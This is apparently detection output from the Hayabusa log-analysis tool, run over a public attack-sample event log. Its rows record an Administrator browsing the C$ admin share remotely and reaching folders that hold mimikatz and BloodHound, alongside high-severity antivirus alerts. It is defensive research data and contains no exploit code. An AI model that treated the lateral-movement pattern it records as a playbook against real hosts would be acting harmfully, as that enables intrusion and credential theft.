2019-03-18 23:23:25.509 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src\fonts | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.509 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src\img | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.519 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src\js | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.519 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\HackingStuff | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.519 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\HackingStuff\logs | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.529 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\mimikatz_trunk | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.529 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\mimikatz_trunk\Win32 | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.529 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\mimikatz_trunk\x64 | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.529 +09:00,PC01.example.corp,5145,high,ResDev,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.529 +09:00,PC01.example.corp,5145,high,ResDev,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.529 +09:00,PC01.example.corp,5145,high,ResDev,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.539 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Documents | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.539 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Downloads | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.539 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Favorites | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.549 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Favorites\Links\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.549 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Favorites\Links for United States\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.549 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Favorites\Links | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.559 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Favorites\Links for United States | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.559 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Links | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.559 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Music | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.559 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Pictures | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.559 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Saved Games | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.559 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Searches | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.569 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Videos | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.569 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user02 | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.569 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user02\Contacts\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.569 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user02\Desktop\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.569 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user02\Documents\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.569 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user02\Downloads\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.579 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user02\Favorites\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.579 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user02\Links\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.579 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user02\Music\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.579 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user02\Pictures\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.579 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user02\Saved Games\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.579 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user02\Searches\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.589 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user02\Videos\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.589 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user02\Contacts | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.589 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user02\Desktop | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.589 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user02\Desktop\mimikatz_trunk | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.589 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user02\Desktop\mimikatz_trunk\Win32 | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.589 +09:00,PC01.example.corp,5145,high,ResDev,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.589 +09:00,PC01.example.corp,5145,high,ResDev,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.599 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user02\Desktop\mimikatz_trunk\x64 | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.599 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user02\Documents | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.599 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user02\Downloads | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.599 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user02\Favorites | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.599 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user02\Favorites\Links\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.599 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user02\Favorites\Links for United States\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.599 +09:00,PC01.example.corp,5145,high,ResDev,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.609 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user02\Favorites\Links | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.609 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user02\Favorites\Links for United States | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.609 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user02\Links | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.609 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user02\Music | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.609 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user02\Pictures | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.619 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user02\Saved Games | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.619 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user02\Searches | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.619 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user02\Videos | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.619 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user03 | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.619 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user03\Contacts\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.619 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user03\Desktop\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.619 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user03\Documents\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.629 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user03\Downloads\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.629 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user03\Favorites\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.629 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user03\Links\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.629 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user03\Music\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.629 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user03\Pictures\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.629 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user03\Saved Games\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.639 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user03\Searches\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.639 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user03\Videos\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.639 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user03\Contacts | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
